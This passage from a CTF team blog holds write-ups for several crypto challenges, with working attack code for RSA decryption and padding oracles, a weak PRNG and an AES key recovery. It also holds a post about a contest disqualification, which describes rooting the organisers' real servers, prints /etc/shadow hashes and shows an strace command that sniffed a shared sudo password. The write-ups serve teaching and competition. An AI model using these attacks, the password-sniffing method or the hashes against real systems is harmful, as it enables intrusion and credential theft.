    known[i][2] = known[i][6] ^ known[i-1][6]

# reusing same equations but for different bytes
# d[i] = S^-1[a[i] ^ a[i+1]]
for i in reversed(xrange(7, 10)):
    known[i-1][15] = isbox[known[i][2] ^ known[i-1][2]]

# c[i+1] = d[i] ^ d[i+1]
for i in reversed(xrange(7, 9)):
    known[i][11] = known[i][15] ^ known[i-1][15]

# b[i+1] = c[i] ^ c[i+1]
for i in reversed(xrange(8, 9)):
    known[i][7] = known[i][11] ^ known[i-1][11]

for i, k in enumerate(known):
    s = "".join("+" if x is not None else "?" for x in k)
    print "%2d" % i, s, "%d/16" % s.count("+")

The result:

 0 ???????????????? 0/16
 1 ???????????????? 0/16
 2 ???????????????? 0/16
 3 ++???????????++? 4/16
 4 ++???????++??++? 6/16
 5 ++???++??++??++? 8/16
 6 +++??++??++??+++ 10/16
 7 +++??++??+++?+++ 11/16
 8 +++??+++?+++?+++ 12/16
 9 +++??++??++??++? 9/16
10 ++?????????????? 2/16

It is quite interesting that in the end we arrived at 12/16 known bytes for only one subkey (#8). It happened because at each step the first and last subkeys did not have good neighbours. That is, if the backdoor had also leaked 2 bytes for subkeys 0-2, we would have known an almost full subkey. And it seems that with one round less of leakage the problem would become much harder.

Anyway, we can now bruteforce the 4 unknown bytes of the 8th subkey, revert the AES key schedule, compute the master key and verify it against the known encryption.
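Reverting the key schedule is cheap because every step is invertible. A self-contained Python 3 sketch, checked on the locally dumped key from the gdb session above (round key 8 is copied from that listing; the function names are ours):

```python
def gmul(a, b):
    """Multiply in GF(2^8) modulo the AES polynomial."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a <<= 1
        if a & 0x100:
            a ^= 0x11b
        b >>= 1
    return r

def sbox_byte(x):
    inv = next((y for y in range(1, 256) if gmul(x, y) == 1), 0)
    r = inv
    for i in range(1, 5):
        r ^= ((inv << i) | (inv >> (8 - i))) & 0xff
    return r ^ 0x63

SBOX = [sbox_byte(x) for x in range(256)]

def previous_round_key(rk, round_index):
    """Invert one AES-128 key schedule step: round key round_index -> round_index - 1."""
    w = [list(rk[i:i + 4]) for i in range(0, 16, 4)]
    prev = [None] * 4
    for j in (3, 2, 1):
        prev[j] = [a ^ b for a, b in zip(w[j], w[j - 1])]
    rcon = 1
    for _ in range(round_index - 1):
        rcon = gmul(rcon, 2)
    t = [SBOX[b] for b in prev[3][1:] + prev[3][:1]]   # rotate, then substitute
    t[0] ^= rcon
    prev[0] = [a ^ b for a, b in zip(w[0], t)]
    return bytes(sum(prev, []))

rk = bytes.fromhex("6bb69e2984015c0e2aed64fd6ca5e451")   # round key 8 from the listing
for i in range(8, 0, -1):
    rk = previous_round_key(rk, i)
print(rk.hex())
```

In the actual attack this inversion runs once per guess of the 4 unknown bytes, about 2^32 times, which is why the brute force is done in C.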

We again reuse the Belluminar’s ahyes implementation in C, here’s the main code (full code):

void undo_key_schedule(uint8_t subkeys[11][16]) {
    uint8_t tmp[4];
    for(int i = 8; i >= 1; i--) {
        FORN(j, 4) subkeys[i-1][12+j] = subkeys[i][12+j] ^ subkeys[i][8+j];
        FORN(j, 4) subkeys[i-1][8+j] = subkeys[i][8+j] ^ subkeys[i][4+j];
        FORN(j, 4) subkeys[i-1][4+j] = subkeys[i][4+j] ^ subkeys[i][j];
        tmp[0] = sbox[subkeys[i-1][12+1]] ^ fexp2(i-1);
        tmp[1] = sbox[subkeys[i-1][12+2]];
        tmp[2] = sbox[subkeys[i-1][12+3]];
        tmp[3] = sbox[subkeys[i-1][12+0]];
        FORN(j, 4) subkeys[i-1][j] = subkeys[i][j] ^ tmp[j];
    }
}

int main(int argc, char *argv[]) {
    uint8_t src[16] = "123";
    uint8_t dst[16] = {};
    uint8_t ciphertext[16] = "\xe2\xa7\x3d\xd0\xd1\x3f\x83\x54\x49\xeb\x3a\x5b\x65\xe7\x08\xb1";

    int subkey8[16] = {0xaa,0x42,0x29,-1,-1,0xa4,0x4c,0x86,-1,0xac,0x4a,0x7d,-1,0x81,0x4b,0x19};
    int indices[4] = {};
    int ni = 0;

    uint8_t subkeys[11][16];
    FORN(i, 16) {
        if (subkey8[i] == -1)
            indices[ni++] = i;
        subkeys[8][i] = subkey8[i];
    }

    for(uint64_t vals = (atoi(argv[1])*1ll) << 24; vals < 1ll << 32; vals++) {
        if ((vals & 0xffffff) == 0) fprintf(stderr, "%08llx\n", vals);

        FORN(i, 4) subkeys[8][indices[i]] = (vals >> (i*8)) & 0xff;
        undo_key_schedule(subkeys);
        encrypt(dst, src, 16, subkeys[0], 0, 10);
        if (!memcmp(dst, ciphertext, 16)) {
            printf("FOUND! %08llx\n", vals);
            FORN(i, 16)
                printf("%02x ", subkeys[0][i]);
            puts("");
        }
    }
    return 0;
}

In roughly an hour we obtain the correct master key and decrypt the flag: TWCTF{Why_doesn’t_he_leak_the_key_directly}

Tokyo Westerns/MMA CTF 2016 – Pinhole Attack (Crypto 500)

hellman — Mon, 05 Sep 2016 16:00:52 +0000

Decrypt the cipher text with a pinhole.

$ nc cry1.chal.ctf.westerns.tokyo 23464
pinhole.7z

Summary: attacking RSA using decryption oracle leaking 2 consecutive bits in the middle.

In this challenge we are given access to a decryption oracle, which leaks only 2 consecutive bits in the middle of the decrypted plaintext:

b = size(key.n) // 2

def run(fin, fout):
    alarm(1200)
    try:
        while True:
            line = fin.readline()[:4+size(key.n)//4]
            ciphertext = int(line, 16) # Note: input is HEX
            m = key.decrypt(ciphertext)
            fout.write(str((m >> b) & 3) + "\n")
            fout.flush()
    except:
        pass

We are also given an encrypted flag and our goal is to decrypt it.

Recall that plain RSA is multiplicatively homomorphic: if we multiply the ciphertext by $r^e$, the plaintext gets multiplied by $r$, and we need only the public key to do it.
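To make the homomorphic property concrete, here is a minimal sketch with a toy key. The primes, the exponent and the names `m`, `r`, `c_blinded` are illustrative assumptions, not values from the challenge.

```python
# Toy RSA key built from two Mersenne primes (far too small for real use;
# an assumption made only for this illustration).
p, q = 2**31 - 1, 2**61 - 1
n = p * q
e = 65537
d = pow(e, -1, (p - 1) * (q - 1))   # private exponent (needs Python 3.8+)

m = 123456789                        # some plaintext, m < n
c = pow(m, e, n)                     # its ciphertext

r = 42
c_blinded = (pow(r, e, n) * c) % n   # uses only the public key (n, e)
m_blinded = pow(c_blinded, d, n)     # what the decryption oracle would see

print(m_blinded == (r * m) % n)
```

The blinded ciphertext decrypts to $rM \bmod N$, which is exactly what lets us shift or scale the hidden plaintext before asking the oracle.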

Let’s multiply the ciphertext by $2^{-e}$. Assume that the oracle gives bits $(a,b)$ for the ciphertext $C$ and $(c,d)$ for the ciphertext $2^{-e}C\pmod{N}$. Then there are two cases:

If the message $M$ is even, then dividing by 2 is equivalent to shifting it right by one bit.
Otherwise, $M$ is transformed into $(M + N) / 2$.

In the first case, due to the shift we must have $d = a$. In the second case, depending on the carries it can be anything. However, if $d \ne a$ then we learn for sure that $M$ is odd, i.e. $LSB(M) = 1$. As a result we get this probabilistic LSB oracle:

$a,b = oracle(C);$
$c,d = oracle(2^{-e}C);$
If $d \ne a$ then $LSB(M) = 1.$

How can we use it?

Let’s assume that we have confirmed that $LSB(M) = 1$. Otherwise we can “randomize” the ciphertext by multiplying it by some $r^e$ (we will be able to remove this constant after we fully decrypt the message) until the condition holds.

Remember that we can multiply the message by any number $d$ (from here on $d$ denotes this multiplier, not the oracle bit above). What do we learn from the oracle when it happens that $LSB(dM \bmod N) = 1$? Let $k = \lfloor dM/N \rfloor$, then:

$$dM - kN \equiv 1 \pmod{2}.$$

We know that $N$ is odd and $M$ is odd, hence

$$k \equiv d + 1 \pmod{2}.$$

We also know $d$, therefore we learn the parity of $k$. If $d$ is small, we can enumerate all possible $k$, since $k < d$. Each candidate $k$ gives us a possible range for the message (from the definition of $k$):

$$\frac{kN}{d} \le M < \frac{(k+1)N}{d}.$$

Example: assume that $LSB(5M \bmod N) = 1$. Then $k$ is even and is less than $5$. The possible candidates are $0,2,4$. That is, the message $M$ must be in one of the three intervals:

$$0 \le M < N/5, \text{ or}$$

$$2N/5 \le M < 3N/5, \text{ or}$$

$$4N/5 \le M < 5N/5.$$

So we have reduced the possible message space. Note however that each of these intervals has size about $N/d$. If we want to reduce the message space to only a few messages, we would need a large $d$. Then we will not be able to check all candidates for $k$!
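The enumeration for a small multiplier can be sketched as follows. The function name and the inclusive integer bounds are my own choices for illustration; the writeup itself works with half-open real intervals.

```python
def candidate_intervals(n, d):
    """Inclusive ranges (lo, hi) that may contain an odd M < n
    when LSB(d*M mod n) = 1 and n is odd."""
    out = []
    # k < d and k has parity d + 1
    for k in range((d + 1) % 2, d, 2):
        lo = -(-k * n // d)               # ceil(k*n/d)
        hi = -(-(k + 1) * n // d) - 1     # largest M with d*M < (k+1)*n
        out.append((lo, min(hi, n - 1)))
    return out

print(candidate_intervals(10007, 5))
```

For $d = 5$ this yields three ranges, one for each of $k = 0, 2, 4$, as in the example above.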

But there is a nice trick: we can deduce the possible intervals for $k$ for a given $d$ from the previously obtained intervals for $M$! I learnt this trick from this article, explaining Bleichenbacher’s attack (see section “Narrowing the initial interval”). Indeed, if $l \le M \le r$ then

$$\left\lfloor \frac{dl}{N} \right\rfloor \le k \le \left\lfloor \frac{dr}{N} \right\rfloor.$$
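One refinement step based on this bound might look like the sketch below. It uses plain Python lists of inclusive ranges instead of `libnum.ranges.Ranges`, and the name `narrow` is hypothetical.

```python
def narrow(intervals, d, n):
    """Refine inclusive (lo, hi) ranges for M, given LSB(d*M mod n) = 1,
    with M and n odd. Only k values reachable from each range are tried."""
    result = []
    for lo, hi in intervals:
        k = d * lo // n
        if k % 2 == d % 2:        # k must have parity d + 1
            k += 1
        k_max = d * hi // n
        while k <= k_max:
            new_lo = max(lo, -(-k * n // d))            # ceil(k*n/d)
            new_hi = min(hi, -(-(k + 1) * n // d) - 1)  # d*M < (k+1)*n
            if new_lo <= new_hi:
                result.append((new_lo, new_hi))
            k += 2
    return result
```

The number of $k$ candidates per range is about $d \cdot (hi - lo) / N$, so it stays small as long as the ranges shrink as fast as $d$ grows.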

To sum up, here is the algorithm structure:

Set possible range for $M = [0,N-1]$.
Set small $d$.
Loop:

If $oracle_{LSB}(dM \mod{N}) = ?$ then try another $d$.
For each possible interval for $M$:

Deduce possible range for $k$.
Iterate over all $k$ with parity different from $d \bmod 2$ and obtain the union of possible intervals for $M$.
Intersect these intervals with the previous intervals for $M$.

Increase $d$, for example double it.

There is a small detail. If we keep doubling $d$, then the number of intervals for $M$ grows quickly and makes the algorithm slower. To keep the number of intervals small, we can multiply $d$ by, let’s say, 1.5 instead of 2 when there are too many intervals.

Here’s python code (works locally by simulating oracle using the secret key):

from libnum import invmod, len_in_bits
from libnum.ranges import Ranges # added recently

from Crypto.PublicKey import RSA

with open("secretkey.pem", "r") as f:
    key = RSA.importKey(f.read())
with open("publickey.pem", "r") as f:
    pkey = RSA.importKey(f.read())

nmid = len_in_bits(pkey.n) // 2

C = int(open("ciphertext").read())
n = pkey.n
e = pkey.e
i2 = pow(invmod(2, n), e, n)

def oracle(c):
    m = key.decrypt(c)
    v = (m >> nmid) & 3
    a = v >> 1
    b = v & 1
    return a, b

def oracle_lsb(ct):
    a, b = oracle(ct)
    c, d = oracle( (i2 * ct) % n )
    if d != a:
        return True
    return None

rng = Ranges((0, n - 1))
assert oracle_lsb(C), "need blinding..."
print "Good"

div = 2
ntotal = 0
ngood = 0
while 1:
    ntotal += 1
    div %= n
    C2 = (pow(div, e, n) * C) % n
    if not oracle_lsb(C2):
        div += 1
        continue

    ngood += 1
    cur = Ranges()
    for ml, mr in rng._segments:
        kl = ml * div / n
        kr = mr * div / n
        # ensure correct parity
        if kl % 2 == div % 2:
            kl += 1
        k = kl
        while k <= kr:
            l = k * n / div
            r = (k + 1) * n / div
            cur = cur | Ranges((l, r))
            k += 2

    rng = rng & cur
    print "#%d/%d" % (ngood, ntotal), "good", div, "unknown bits:", len_in_bits(rng.len), "num segments", len(rng._segments)

    if rng.len <= 100:
        print "Few candidates left, breaking"
        break

    # heuristic to keep fewer intervals for M
    if len(rng._segments) <= 10:
        div = 2*div
    else:
        div = div + (div / 2) + (div / 4)

M = int(open("message").read())
print "Message in the %d candidates left?" % rng.len, M in rng

One interesting thing is that the success probability of the described LSB oracle depends strongly on $N$. For some $N$ it is equal to 50% and for some $N$ it is only about 10%. This happens due to different carry chances depending on the middle bits of $N$. Have a look at @carllondahl's writeup, where he investigates more cases for the oracle.

CODEGATEgate

snk — Sat, 07 May 2016 01:51:01 +0000

Final Scoreboard as captured by manhluat (l4w)

TL;DR

CTF team LC↯BC has been banned and stripped of the first place at CODEGATE CTF 2016 Finals.

This was announced after the competition ended and even after the winners had been announced. The disqualification decision was made in the most unprofessional and biased way possible, and the CTF organizers (Black Perl Security) and CODEGATE have been ignoring our emails since the start of this week, so we are making it public to avoid gossip and speculation.

Also, there are a few technical details.

Timeline

1. PPP 3570 2. LC↯BC 3440 3. 0daysober 2658
30 min before the end of the CTF, we hold second place behind PPP. The distance to first place is a couple hundred points: we need either of the two remaining challenges to make it to the top.

T−10min. We submit hulkbox challenge to the gameboard, getting 1st.
1. LC↯BC 3761 2. PPP 3570 3. 0daysober 2658

T−9min. The CTF organizers’ team leader aggressively demands that we show him the exploit for the challenge. The task was pwned by one of us who couldn’t make it to Korea and was swapped with someone who could; the guy is asleep in Russia at the moment the flag is submitted (3:50 a.m. in the UTC+3 timezone), so we propose to show the orgs the exploit later, once he’s up.

T=. CTF ends, organizers announce the winners. Press begins to interview us.

T+15min. Organizers interrupt the press session and make everyone leave except the teams. It is announced that one of the teams was using remote assistance during the competition. A poll is held on whether remote help is good or bad. “It’s good” 3 : 7 “it’s bad”

T+20min. It’s announced that LC↯BC is disqualified. Scoreboard shifts one row up. We ask why did we get disqualified. — Remote assistance. — But it’s not in the rules?? — It’s not in the rules, and you’re disqualified.
1. PPP 3570 2. 0daysober 2658 3. 217 2632

T+30min. Orgas announce the winners: PPP, 0daysober, 217.

T+4days. None of our emails to either CODEGATE or CTF orgas get answered.

Fun bits

The rules don’t mention anything regarding remote players. We will not speculate whether other teams asked their folks who couldn’t come to Seoul for help, but since the voting result was 3 : 7, this rule was not common knowledge. If it is forbidden and important to the point of taking away a team’s result, the rules should state it openly.
The orgas team leader circled at the PPP table, talking Korean in a low voice throughout the entire game. We know that sounds stupid, but that’s at least amusing. It even made us think the orgas might be biased in their decision when we surpassed PPP. Now that the orgs don’t answer our attempts to communicate, they’re clearly not cooperative with us.
For the last two hours the orgas stared at our displays assertively. Apart from the fact that it’s pretty uncomfortable and breaks the focus when you try to RE, they totally had more than enough time to tell us if they didn’t like anything about us.
Well, we pwned the infrastructure.
VMs that hosted the services were running this:
Linux codegate 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
which is a quarter-year old kernel vulnerable to this unpopular local privilege escalation strategy (shoutout to halfdog.net).

We were able to get UID 0 on hackerlife and get a free flag (which we didn’t submit until we pwned the challenge) as well as /etc/shadow as our trophy.
codegate:$6$keSuElh.$t/C2mXZj5dKCfOIgGB0WGgP2aq6OwfR/m0PAI1gHAoAqZMwOErpDY7jPHwferwlxd3EFjHeQLdmy5/atDbcGi.:16917:0:99999:7:::
hackerlife:$6$e9i/0OiN$yGSFlCXUkSaNmZiIY6qe9Ns12fdFJ.xiEiAnsIKa6etN2StNeYIWdqN59RtXvXUI1LRBc9dUw6uzI9NZon7ox1:16922:0:99999:7:::
hackerlife_pwned:$6$HGrFrh2f$kZp3WZj7T3P6BsH4hLsyQJF8SazU723xt5PTXQRvbxb9M/5i5aBHSFIl6xqgJpsMggbiHH.IvUCsciqShZqvq.:16920:0:99999:7:::

Some time later payload challenge was released, running the exact same kernel, so why not try escalating there too?
codegate:$6$keSuElh.$t/C2mXZj5dKCfOIgGB0WGgP2aq6OwfR/m0PAI1gHAoAqZMwOErpDY7jPHwferwlxd3EFjHeQLdmy5/atDbcGi.:16917:0:99999:7:::
g0est:$6$zajX8vRv$pFoFz2.0WcgzVxMQrvAAKuXzq2/9h4Gx.Z5w1HLizVFNh58GirRWSvrAtvlSptbueUCoZEbAZSEMrNNdGBYdw/:16923:0:99999:7:::
payload:$6$JyY8yroK$row2/e4t/cH1y9MGDNNm6Qqv6bpBFedLNuqSt1vRjEk3EtV23cxBHSqjcH6T97D4mmtArLqFfNRAFKXNUMs2P.:16923:0:99999:7:::

OK, this is interesting. codegate user has the exact same hash. Let’s attach strace to SSH server and wait for password to fly by in plaintext.
root@codegate:/# strace -ff -p 17809 -e read |& fgrep ', "\f\0\0'
[pid 17865] read(6, "\f\0\0\0\21qkqojrr******lek!", 22) = 22

And yeah, it turns out that every game box does have a sudoer codegate account with the exact same password (which is qkqojrr******lek!). Game over!
After paying a friendly visit to every vulnbox and scoreboard server, we stopped wasting time on this fun “side challenge” and proceeded to play as usual.

Treat this as a fun piece.

Facts

LC↯BC had 4 people on-site and 2 remote connected via VPN.
On-site guys played 100% of the CTF time, remote guys joined and left at their leisure: no-one has free 20 hours during a workday.
LC↯BC got root privileges on every game server. No attempts were made to destabilize the infrastructure or ruin the fun of the game.
Security specialists who organize a CTF with an eight-year history and 55K USD in prizes did:
- use old Linux kernel version with a public exploit available;
- use the same password for a sudo user on the entire infrastructure;
- use passwords to access the servers;
- spend their time on petty tyranny and annoying players.
Our solutions for all the tasks that we have submitted:
https://www.dropbox.com/sh/oruwb6f7v6p4pdx/AACF0EE82_cfnV-JeMQbDOlea
/home/g0est/flag_tlqkf.txt from payload vulnbox that we have not submitted:
PAYLOADISNOT_PAYLOADUNLOAD_}

Q & A

Questions related to rules of the competition:

Screenshot of the rules taken during competition

Q: Did LC↯BC submit write-up to CODEGATE organizer after the qualification?
A: Yes

Q: Did LC↯BC join both CODEGATE CTF 2016 and CODEGATE CTF Junior 2016?
A: No

Q: Did LC↯BC share the solution or key of any challenge while competition?
A: No

Q: Did LC↯BC attack operating server for everyone :)?
A: No

Q: Was there a rule effective regarding immediately showing your exploit to event organizer?
A: No

Q: Was there a rule effective regarding remote team members?
A: No

General questions

Q: Were there remote players playing for us?
A: Yes

Q: Were we warned before or during the game that remote help can lead to disqualification?
A: No

Q: Have we traded any flags with other teams or organizers?
A: Of course not!

Q: Have we compromised CTF infrastructure (server-side) ?
A: Yes

Q: Did we interfere with infrastructure in any way that ruins CTF gameplay for anyone?
A: No

Q: Did we have the ability to score every single flag available in the competition (incl. Junior CTF) ?
A: Yes

Q: Were all flags submitted to the scoreboard solved by LC↯BC in a proper way?
A: Yes

Hope this shares our vision reasonably and ends any rumors and conjectures about what happened to our team in Seoul this year. We’d like to add that CODEGATE organizers were friendly and helpful every year (we’re visiting the event for the 6th year in a row), and we hope to hear their vision of the current situation.

Current stance of the orgas really does surprise and irritate us and makes us wonder what to expect from future CODEGATEs.

Guys, please don’t hide. We’re up to discuss it peacefully.

Google CTF – Woodman (Crypto 100)

hellman — Tue, 03 May 2016 19:06:13 +0000

How honest are you?

Running here

Summary: breaking a weak PRNG

On the main page we see the text:

You are coming back home from a hard day sieving numbers at the river.
Unfortunately, you trip and all your numbers fall in a nearby lake.

Continue.

We click Continue and then:

From the lake a god emerged carrying a number on each hand.
He looked at you and asked the following question…

Continue.

Again, click Continue:

Did you drop 4452678531 or 754311689?

If we enter one of the numbers, we either get another question or start from the beginning. So it seems that we need to guess the correct numbers many times.

The numbers look random and the challenge looks like pure guessing. But after looking around, we can find a snippet of code hidden in the html source of the second page. It is hidden in a html comment and padded down with 500 empty lines. Here’s the snippet:

class SecurePrng(object):
    def __init__(self):
        # generate seed with 64 bits of entropy
        self.p = 4646704883L
        self.x = random.randint(0, self.p)
        self.y = random.randint(0, self.p)

    def next(self):
        self.x = (2 * self.x + 3) % self.p
        self.y = (3 * self.y + 9) % self.p
        return (self.x ^ self.y)

It is quite a simple PRNG: it consists of two LCGs combined with xor.

We can guess the first few values and then attack the PRNG to recover the seed and predict next outputs.

The simplest solution is to bruteforce all candidates for $x$, deduce $y$ as xor of PRNG output with $x$ and check if the numbers match. But I will describe another solution, which exploits the fact that the multipliers are very small (2 and 3). This solution would work for much larger $p$.
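The brute-force idea can be sketched on a scaled-down instance. Here the modulus `10007` and the seed values are assumptions chosen so that the loop finishes instantly; for the real $p = 4646704883$ the same loop has about $4.6 \cdot 10^9$ iterations and would more realistically be written in C.

```python
class Prng:
    """Same update rule as SecurePrng, with the state passed in explicitly."""
    def __init__(self, p, x, y):
        self.p, self.x, self.y = p, x, y

    def next(self):
        self.x = (2 * self.x + 3) % self.p
        self.y = (3 * self.y + 9) % self.p
        return self.x ^ self.y

def recover_states(p, outputs):
    """All states (x, y) right after outputs[0] that also explain outputs[1:]."""
    found = []
    for x in range(p):
        y = outputs[0] ^ x          # y is forced by the first output
        if y >= p:
            continue
        g = Prng(p, x, y)
        if all(g.next() == o for o in outputs[1:]):
            found.append((x, y))
    return found

# Demo on a toy modulus (hypothetical values).
gen = Prng(10007, 1234, 5678)
outs = [gen.next() for _ in range(4)]
print(recover_states(10007, outs))
```

Once a state is recovered, stepping a fresh `Prng` from it predicts every following number, so each later question can be answered correctly.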

The idea is to reconstruct $x$ bit by bit, from the least significant to the most significant bits. Since we also know $x \oplus y$, we immediately obtain the values of the same bits of $y$. Then, to account for the modulus $p$, we simply guess how many times $p$ is subtracted on overflow. This number is not greater than the multiplier and, since the multipliers are small, there are only a few possible values. So we compute the least significant bits of $x' = 2x + 3 - k_x p$, then we obtain the least significant bits of $y'$ from the known $x' \oplus y'$, and we check whether for some $k_y$ the congruence $y' \equiv 3y + 9 - k_y p \pmod{2^t}$ holds.

Note that when we guess a bit of $x$, it is possible that both bit values pass the test, leading to an exponential explosion. One option is to compute the next values (the same LSBs) and check if they match the third generated value (and for this we need to guess the modulus reductions again). But it seems that when one of the multipliers is even, there is at most one candidate per $k_x,k_y$ guess. I haven’t proved this, just observed it experimentally. So for the multipliers 2,3 it works perfectly.

Here’s POC:

import random
from itertools import product

P = 2**256 + 7
NBITS = P.bit_length()

Ax, Cx = 2, 5
Ay, Cy = 3, 7

def next(x, y):
    x = (Ax*x + Cx) % P
    y = (Ay*y + Cy) % P
    return x, y

# generate two values
X0, Y0 = random.randint(0, P-1), random.randint(0, P-1)
print "X0", hex(X0)
print "Y0", hex(Y0)
realkx = (Ax*X0 + Cx) / P
realky = (Ay*Y0 + Cy) / P
print "REAL KX KY", realkx, realky
X1, Y1 = next(X0, Y0)
X2, Y2 = next(X1, Y1)
prng = [X0 ^ Y0, X1 ^ Y1, X2 ^ Y2]

# guess modulo reductions
for kx, ky in product(range(Ax), range(Ay)):
    xs = {0}
    # go from LSB to MSB
    for b in xrange(NBITS):
        if not xs:
            break
        xs2 = set()
        mask = 2**(b+1) - 1
        mod = 2**(b+1)
        for x, bx in product(xs, range(2)):
            x |= bx << b
            y = (prng[0] ^ x) & mask
            if x >= P or y >= P:
                continue
            x1 = (Ax*x + Cx - kx * P) % mod
            y1 = (Ay*y + Cy - ky * P) % mod
            if (x1 ^ y1) & mask == prng[1] & mask:
                xs2.add(x)
        xs = xs2
    else:
        print kx, ky, ":", len(xs), "candidates"
        for x0 in xs:
            y0 = prng[0] ^ x0
            assert x0 < P
            if y0 >= P:
                continue
            x1, y1 = next(x0, y0)
            if x0 ^ y0 == prng[0] and x1 ^ y1 == prng[1]:
                print "GOOD", hex(x0), hex(y0)

The flag: CTF{_!_aRe_y0U_tH3_NSA_:-?_!_}

Google CTF – Spotted Wobbegong (Crypto 100)

hellman — Sun, 01 May 2016 19:47:18 +0000

Are you able to defeat 1024-bit RSA?

public.pem

Summary: breaking RSA with PKCS v1.5 padding and exponent 3.

On the web page we see two options: get token and check token. It is also said that the message is encrypted using PKCS v1.5 padding. The tokens are randomized. An example token:

{"token": "226ef61c703ff633889a44becc24fce9ba196
852aab918057c30f3ca63d0c32ee43b8cec004789ef6e6f4
55f141bde90fbb0bec96583f06ea7db0948a77da4ec65f49
1456690653024c312778838e411c579f07261cd3e238fc88
36637b95d94d1eca3e1b33a061fd25683f768462c35eca44
2558c21eaa7fed42f187210ac7a"}

Let’s look at the public key:

$ openssl rsa -in publickey -pubin -text
Public-Key: (1024 bit)
Modulus:
    00:96:e0:7d:13:84:28:34:45:11:25:9c:59:13:6e:
    9b:0a:e9:f1:44:50:1e:d1:0d:e1:76:9a:53:c8:93:
    e9:6b:db:a2:6b:ce:10:48:1c:e2:1f:53:30:c4:75:
    43:61:57:47:9f:4e:c0:9f:45:45:08:1b:ca:6f:94:
    af:21:27:3c:2b:89:36:a5:f5:59:be:8f:73:9b:b9:
    99:c2:d3:72:04:ec:c4:e1:c8:cb:ba:77:43:b8:99:
    09:9b:71:3e:aa:96:14:ed:f8:c9:1f:d0:94:ce:61:
    92:11:de:f9:39:39:e2:4e:3c:ae:01:34:c7:0b:3a:
    18:d9:7b:53:e3:6c:db:3d:e5
Exponent: 3 (0x3)

1024 bit modulus and the exponent is 3, suspicious!

In brief, PKCSv1.5 is a padding for RSA encryption which looks like this:

$(00)(message\ type)(random\ bytes)(00)(message)$.

The message type is usually equal to $02$.
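For reference, a minimal sketch of building and parsing such a block. The function names are hypothetical, and the checks are simpler than what a real library (or the challenge server, whose exact checks are unknown) performs.

```python
import os

def pad_type2(message: bytes, k: int) -> bytes:
    """Build 00 || 02 || PS || 00 || message with total length k bytes."""
    ps_len = k - 3 - len(message)
    if ps_len < 8:
        raise ValueError("message too long for this block size")
    # Nonzero filler bytes (slightly biased, fine for a demo).
    ps = bytes(b % 255 + 1 for b in os.urandom(ps_len))
    return b"\x00\x02" + ps + b"\x00" + message

def unpad_type2(block: bytes) -> bytes:
    """Return everything after the first zero byte that follows 00 02."""
    if len(block) < 11 or block[:2] != b"\x00\x02":
        raise ValueError("bad header")
    sep = block.index(b"\x00", 2)   # raises ValueError if there is none
    return block[sep + 1:]

block = pad_type2(b"hello", 128)
print(unpad_type2(block))
```

The parser only cares about where the first zero byte after the header is, which is why a zero byte appearing "by chance" in a modified plaintext changes what gets decoded.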

PKCSv1.5 is known to be vulnerable to padding oracle attacks, and that is what we have here. There is a writeup on Dobbertin Challenge 2012, where the Bleichenbacher attack is used to decrypt arbitrary messages. But it seems it is quite slow here; also, we don’t get the message type byte from the oracle.

Let’s encrypt some correctly padded message and see the answer from the server:

import requests
from libnum import s2n, n2s, invmod

def oracle(c):
    c = "%x" % c
    if len(c) & 1:
        c = "0" + c
    data = '{"token": "%s"}' % c
    r = requests.post("https://spotted-wobbegong.ctfcompetition.com/checktoken", data=data, verify=False)
    return r.content

N = 105949368219170569676644297776119989261727047689020303679150543602433973822995622211997257369689976874802809991413640314155194724653004419692410129247990491389423643529600372760167148548937151460112884769720131611650468716029162594828863368194056749527587059285082313899147126415401813360799509875983663185381
E = 3

m = "\x00\x02"
m = m.ljust(95, "R") + "\x00"
m = m.ljust(128, "M")
c = s2n(m)
c = pow(s2n(m), E, N)
print oracle(c)

The answer is:

{
"status": "invalid",
"decoded": "4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d",
"message": "token is invalid"
}

If the padding is correct the server leaks the decoded message! We can exploit this to decrypt the token: we just need to find some multiplicatively related correctly padded message.

And that is quite easy: assume that the padded unknown message $m$ has some small factor, e.g. 17. Then we can multiply the ciphertext by modular inverse of $17^e$ and the respective message will be divided by 17. Afterwards, we can multiply it back but by slightly different value, e.g. 16 or 18. As a result, we have multiplied the message by a fraction $16/17$ or $18/17$. In such a way a few of the most significant bits won’t change. And the padding bytes 00 02 will stay correct. If we manage to get the middle 00 byte somewhere (it happens quite often by chance), then we can leak some part of the message. After multiplying it back by the inverse fraction, we will recover part of the original message.

Note that we can’t multiply by the inverse fraction modulo $N$, because we don’t leak the full value, e.g. we don’t leak the random bytes. But we can do it modulo a power of 2. And for this to be possible, both numerator and denominator of the fraction should be odd. So let’s assume we multiply by $19/17$.

Let $m = padding \cdot 2^k + s$, where $k$ is some integer and $s$ is the secret text smaller than $2^{k-8}$. If the described event happens, then

$$m \cdot \frac{19}{17} = \frac{19}{17} \cdot 2^k \cdot padding + \frac{19}{17} \cdot s = rand \cdot 2^t + s'.$$

We leak $s'$ and, if we consider the equation modulo $2^t$, we can multiply $s'$ by $17/19$ and recover $s \pmod{2^t}$.
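The last step is plain modular arithmetic and can be sketched on its own. The helper name is hypothetical, and the demo assumes the message is divisible by 17 and that no reduction modulo $N$ happens.

```python
def undo_fraction(leaked: int, t: int, num: int = 19, den: int = 17) -> int:
    """Given the low t bits of m * num / den (num and den odd),
    return m mod 2**t."""
    mod = 1 << t
    return (leaked * den * pow(num, -1, mod)) % mod

# Demo with a made-up message that is a multiple of 17.
m = 17 * 0x1234567890abcdef1234567
leaked = (m // 17 * 19) % 2**64      # low 64 bits of m * 19/17
print(undo_fraction(leaked, 64) == m % 2**64)
```

Both 17 and 19 must be odd here: an even numerator would have no inverse modulo $2^t$.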

Let’s try it! Here’s the code:

import json
import requests
from libnum import s2n, n2s, invmod

def oracle(c):
    c = "%x" % c
    if len(c) & 1:
        c = "0" + c
    data = '{"token": "%s"}' % c
    r = requests.post("https://spotted-wobbegong.ctfcompetition.com/checktoken", data=data, verify=False)
    return r.content

# some valid token
token = 0x876c7524d3cf53cd2169a438835c397b2b7e09b783f8b595eb75b88595dec403f10f946141f57dfdcebd330ef2f243b0b8ebbfa32958d2564fcf73768315f5e1ba73e94efd933b696e9cc30978ad73017dfc06a34ee7947cd048deea599597391794e08e43028717bf907929b9195194a2731ac6b98244a73745431398cdaf71

